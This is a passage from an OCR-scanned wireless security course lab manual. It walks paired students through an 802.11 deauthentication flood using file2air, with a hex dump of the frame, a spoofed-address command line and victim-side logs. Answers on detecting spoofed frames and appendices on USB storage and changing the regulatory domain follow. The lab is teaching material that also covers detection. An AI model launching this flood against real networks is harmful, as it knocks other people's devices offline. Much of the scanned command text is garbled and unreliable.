roles after completing this lab so each person has the opportunity to attack another system, If it is more convenient to work in a group of three for this lab exercise, read the information in the ADDITIONAL EXERCISE section to have a third participant capture the DoS attack exchange with a sniffer like Wireshark. 11.1.1. [VICTIM] Connect to the classroom network ‘We will use the "SANS-ROGUEOI" network for connectivity that will be attacked. The SANS-ROGUEO! network is open and does not require a WEP key for authentication. Execute the following commands from a shell prompt to connect to the SANS- ROGUEO! network: ¥ killal1 dheped ¥ iwconfig wlan0 essid SANS-ROGUEO enc off mode managed ¥ dhoped -d wland At this point, your system should be connected to the SANS-ROGUED! network. If you had trouble getting to this point, please contact a proctor or the instructor for assistance, 1-211.1.2. [VICTIM] Identify address information Next, the victim will identify client information that will be used by the attacker to target the attack. The information that is needed is the MAC address of the victim wireless card, the BSSID of the SANS-ROGUEOl access point, and the channel number. We can identify the MAC address of the wireless card by running the "ifconfig" utility, as shown below: f ifconfig wland wiand Link encap:Ethernet BWaddr 00:02:6F:33:8C:41 inet addr:172.16.0.101 Beast:172.16.0.255 Mask: 255.255.255.0 UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1 RX packets:43830 errors:0 dropped:20 overruns:0 feme:0 TX packets:1397 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txquevelen:0 RX bytes:3802819 (3.6 Mb) 1X bytes:818024 (798.8 Kb) Interrupt:10 Memory: e8362000-e836£000 The string following "HWaddr" in this output represents the MAC address of the wireless card. Write this address information in the space provide below. Next, use the "iwconfig" utility to identify the channel and BSSID information for the access point you are currently associated to, as shown below: # iwconfig wland wland TESE 802.1ib ESSTD:"SANS-ROGUEOI" Mode:Managed Frequency:2.462GHz Access Point: 2:76:38 Bit Rate:1iMb/s Sensitivity=1/3 Retry min limit:8 ff Fragment thr:off Power Management :off Link Quality:23/70 Signal level:-70 dBm Noise level:-94 dam Rx invalid awid:0 Rx invalid crypt:11 Rx invalid frag:0 ‘Tx excessive retries:0 Invalid misc:3663 Missed beacon:0 00:0F: 66:8 The string following "Access Point:" in this output represents the BSSID of the access point. Write this address information in the space provide below. The string following "Frequency:” indicates the frequency that is in use. We can convert this value to the channel number by using the chart provided below. Identify the channel number in use by matehing the frequency in the following chart: W-32.412 2.447 8 2417 2 2.452 9 2.422 3 2.457 10 2.427 4 2.462 i 2.432 5 2.467 12 2.437 6 2.472 1B 2.442 7 2.484 14 Use the following text-box to document the MAC address, BSSID and channel number for the victim station: Leer tny oh) Channel 11.1.3, [VICTIM] Ping a remote system In order to quickly identify when the victim station has lost network connectivity, initiate ‘a continuous ping to a remote system, as shown below: # ping -i 5 172.16.0.1 This command will ping the remote host at 172.16.0.1 every five seconds until itis interrupted by pressing CTRL/C. Leave the ping command running until the end of this, exercise. 11.1.4. [ATTACKER] Examine deauthenticate file contents In order to mount a deauthenticate attack, we need to transmit multiple deauthenticate frames onto the network. Weill use the file2air tool for this task, so we need a file that represents the packet will transmit into the network repeatedly. Change to the /tmp/lab! I directory and examine the contents of the file "deauth.bin". Since this is a binary file, we cannot view it with a simple ASCII editor. We can dump the hexadecimal contents of the file with the xxcd utility however, as shown below. # ed /tmp/labil # xxd deauth.bin 9000000: cO00 0000 9060 1af0 9168 OD s6D0_0082 1-4O0000I0: Odd Send oGar GOOD o200 God ae ¥ 1s -1 deauth.bin 1 root root 28 Apr 21 13:12 deauth.bin # ‘The deauth.bin file is small, only 28 bytes. The 28 bytes of this file represent a standard 802.11 management frame (24 bytes) with a 4-byte payload, ‘The leading Oxc0 byte indicates that this packet is a management frame, sub-type deauthenticate frame. The default MAC addresses identified in this packet will be overridden with command-line arguments with the file2air tool. 11.1.5. [ATTACKER] Introduction to file2air Next, run the file2air command with no command-line parameters to identify a list of available options, as shown below: # filevair filezair v1.ORCL - inject 802.11 packets from binary files filegair: Must specify -i and -£ Usage: file2air [options] “i --interface Specify an interface name vr --driver Driver type for injection “f --filename Specify a binary file contents for injection -c --channel Channel number a count Number of packets to send mw --delay Delay between packets (ux for usec or X for seconds) nt ne fast Alias for -w wi0000 (10 packets per second) nd --dest. Override the destination address -s ~-source Override the source address -b --bssid Override the BSSID address -g -=seqnum Override the sequence mmber (leading Ox for hex value) -p -=pieces Fragment the payload into X pieces. ch -help Output this help information and exit -v --verbose Print verbose info (more -v's for more verbosity) # The critical command-line options we are going to use for the DoS attack are detailed as follows: 1-5Command Argument (if any) Description option wland Interface name to use for transmitting packets o ng Driver name used for wlan0 interface f deauth.bin Binary file describing the packet to inject © ‘The channel number of the victim, refer to the chart above for the correct channel number a 100000 Number of packets to transmit before stopping ~~~ inject 10 packets per second, no argument necessary d Destination address to send packet to, refer to the chart above for the victim MAC address “s Source address to spoof, must be MAC address of the AP; use the chart above and specify the AP BSSID address b BSSID address to spoof, use the chart above and specify the AP BSSID address ‘Substitute the arguments in "" with the information collected from the victim station. Implementing the deauthenticate flood attack is very straightforward. Simple run the file2air command with the appropriate arguments, as shown below: *** NOTE: Double-check the channel number and MAC addresses before initiating the DoS attack. DO NOT mount a DoS attack against any stations other than your lab partner. *** # £ileQair -i wlan0 -r wlan-ng -f deauth.bin -c -n 100000 -t =d ~s ~b filegaiz vI.ORCL - inject 802.11 packets from binary files Transmitting packets ... This command will continue to execute for several minutes. Allow this cormmand to continue running while we retumn to examine the victim station. 11-611.1.6. [VICTIM] Examine victim connectivity results Retum to the victim station and examine the output from the ping command. The ping responses will stop incrementing while the attack is underway. After a minute or two, the ping command will present a "Destination Host Unreachable” error Note that it is possible for the victim station to occasionally transmit a ping packet and get a response while being attacked by the victim. This could be because the packets being transmitted by the victim are colliding with other traffic on the network and need to be retransmitted, or because the victim is limiting the attack to 10 deauthenticate frames per second. Examine the last several lines of output from the kernel logger by running the dmesg command, as shown below: # dmesg | tail -24 wifl0: TXEXC - statu: xetry_count=0 tx_rate=0 fc=0x0108 (Data?: 6:63:76: 3b A2=00:02:6f:33:be:41 A: 10:00:00 LinkStatus=1 (Connected) LinkStetus: BSSID=00:0f:66:03:76:3b LinkStatus=2 (Disconnected) LinkStatus: BSSID=00:0£:66:63:76:3b TXEXC - status*0x0004 ((Discon}) tx_control=000c Fe=0x0108 (Data?:0 Tops) 0004 ({Discon]) tx_contro! 0 Tops) FieCs£0: 00: e260 ‘A2000:02:6£:33:be:41 A3e£E: TEELEE (Connected) LinkStatus: BSSID=00:0£:66:e3:76:3b LinkStatus-2 (Disconnected) LinkStatus: BSSID=00:0f:66:¢3:76:3b wifiO: TXEXC - status=0x0004 ([Discon]) tx_contro! retry_counts0 tx_rates0 fo=0x0108 (Data?: 6:03: 76:36 A200: 02:6£:33:be:41 A: E:fE:£Es EE 10:00:00 LinkStatus=1 (Connected) LinkStatus: BSSTD=00:0f:66:e3:76:3b LinkStatus2 (Disconnected) LinkStatus: BSSTD=00:0f:66:e3:76:3b 0004 ([Discon}) tx contro fe=0x0108 (Data?:0 ToDS) 1 ABefEEE:EE: EE: £8262 ade LinkStatus=1 (Connected) LinkStatus: BSSID=00:0f:66:e3:76:3 LinkStatus=2 (Disconnected) LinkStatus: BSSTD=00:0f: 66:63:76: 3b "1-7TinkStatus-1 (Connected) LinkStatus: BSSTD=00:0f:66:e3:76:3b LinkStatus-2 (Disconnected) wifi0: LinkStatus: BSSID=00:0f: 66:63:76: 3b From this output, we can see that the Linux driver is reporting repeated connect and disconnect sessions, between receiving deauthenticate frames from the attacker. 11.1.7, [ATTACKER] Stop the DoS attack Return to the attacker's session and stop the DoS attack by pressing “CTRL cause file2air to stop gracefully, returning to the shell prompt. ‘This will 11.1.8. [VICTIM] Monitor connectivity Afier the attacker stops the DoS attack, the victim station should return to normal connectivity. Question: The victim station returns to normal operating mode when the attack is terminated. What kind of a DoS attack does this represent? 11.4.9. [VICTIM] Cleanup Stop the ping command by pressing "CTRLIC". 1-8ADDITIONAL EXERCISE If there is a third station available, consider using a tool like Wireshark to capture the DoS attack while it is underway. Examine the trace after completing the deauthenticate flood by applying a filter on the victim address: wlan.da eq 00:01:02:03:04:05 or wlan.sa eq 00:01:02:03 Where 00:01:02:03:04:05 is the MAC address if the victim station. What does the cfient system attempt to do when it receives a deauthenticate frame? Is there a way we can determine if the deauthenticate frame was transmitted by an access point or by an attacker? This completes our 1 1"" lab exercise. Congratulations. © 11-9Answers Section 11.1.9 Question: The victim station retums to normal operating mode when the attack is, terminated, What kind of a DoS attack does this represent? Answer: A deauthenticate flood is an example of a non-persistent DoS attack. Section ADDITIONAL EXERCISE Question; What does the client system attempt to do when it receives a deauthenticate frame? Answer: The victim station will attempt to reauthenticate to the network by issuing a probe request, then authenticate and associate requests. Depending on when the deauthenticate frame is received in the process of reconnecting to the network, the station will have to restart the probe request and authenticate and associate process in order to regain connectivity to the network. Question: Is there a way we can determine if the deauthenticate frame was transmitted by ‘an access point or by an attacker? ‘Answer: Examine the sequence number used by the attacker. The sequence number is controlled by firmware for the Prism2 cards supplied in the SWAT kit, and will likely be significantly smaller or larger than the sequence numbers used by the access point. Even though the access point frames and the deauthenticate frames have the same source MAC address and BSSID, a WLAN IDS system can use sequence number analysis to identify anomalies in the pattern and flag the traffic as originating from a spoofed source. 11-10Lab Appendix A This appendix provides a simple set of instructions to use a USB thumb drive for persistent storage when using the Auditor Security Toolkit Linux distribution.Purpose: Configure Auditor to save files to persistent storage. Description: Because the Auditor Security Toolkit Linux distribution is CD-ROM based, when the system is powered-off, all files that were created are lost. Follow these instructions to save files to a USB thumb drive 4.1.1. Open an XTerm Window Open a terminal window by clicking on the XTerm of the square with the number 1 in it) ‘on (the small black box to the left 1.1.2. Make a Mount Point Create a directory in the /mnt directory that will be used as a mount point for the USB drive, as shown below. root@D[root]# mkdix /mnt/thumb xoot@0 [root] # 1.1.3. Insert the USB Thumb Drive Insert the thumb drive into an available USB port. 1.1.4. Identify the USB Device Identify the USB device name used for the thumb drive on your system. For most users, this will be the "/dev/sdal" device. We can get a list of available hard drive partitions and devices by running the "fdisk -I" command, as shown below. root@1{root]# fdisk -1 Disk /dev/sda: 65 MB, 65208320 bytes 128 heads, 11 sectors/track, 89 cylinders Units = cylinders of 1419 * 912 = 726528 bytes Device Boot Start Bnd Blocks Id System fdev/sdal * 1 90 63674 «6 FATIE Partition 1 has different physical/logical endings: phys=(88, 128, 11) logical=(89, 97, 1) root@1[root]#We can see from this output that the USB device is /dev/sda!. ‘This will be the appropriate device name for almost all users. * 1.1.5. Mount the USB Drive Mount the USB drive as shown below. root@1{root]# mount -t vfat /dev/sda1 /mnt/thumb root@l{roct] # 1.1.6. Save Files to the USB Drive When you want to save a file to the USB drive, simply copy it to the /mnt/thumb directory with the “op" command, as shown below. root@1(1ab5]# cp lab@capture.cap /mnt/thunb root@1 (root) # 1.1.7, Unmount the USB Drive Before removing the USB drive, you must unmount it. This will ensure there are no outstanding write operations pending and prevent you from losing data. root@1{root]# umount /mnt/thumb root@1 (root) # 4.1.8. Remove the USB Drive The USB drive is now safe to remove with your data safely stored.This page intentionally left blank.SWAT Kit - International Firmware Selection The wireless cards distributed with the SWAT kit are restricted to transmit and monitor on the channels approved by the US Federal Communications Commission. Follow the instructions in this document to change the regulatory domain on the SWAT kit wireless card for your locale. To complete these steps, you will need the wireless card that was distributed with your SWAT kit as well as the bootable Linux CD-ROM used for lab exercises. Step 1. Boot the Linux CD-ROM Insert the course CD into your CD drive and restart your system, instructing the BIOS to boot from the CD. Once you have booted the Linux CD, open an xterm shell by clicking on the xterm button on the taskbar. Step 2. Insert SWAT kit wireless card Insert the SWAT kit wireless card into the PC Card or PCMCIA slot on your system. Step 3. Execute the chregdom script Execute the script designed to change the local regulatory domain by entering the following commands into your xterm window: root@1[root]# ed /tmp/intt root@1[intl]# ./chregdom.sh Step 4. Answer prompts The chregdom script will ask you to supply your wireless card interface name, and the desired regulatory domain. Please supply this information as instructed. NOTE: Most systems will recognize the SWAT kit wireless card as the "wlan0" interface. Some systems with built-in wireless cards (excluding Intel Centrino wireless cards) may have a naming conflict with a built-in wireless card. In these cases, your system may recognize your SWAT kit wireless card as "wlan". You can determine what interface name is in use by running the "ifconfig -a" and "dmesg" commands on the system. Please seek the assistance of a proctor or the instructor if you need assistance. After supplying the necessary information, the chregdom script will ask you to wait while it updates the wireless card. DO NOT interrupt this process, otherwise it is possible you could irrevocably damage your wireless card.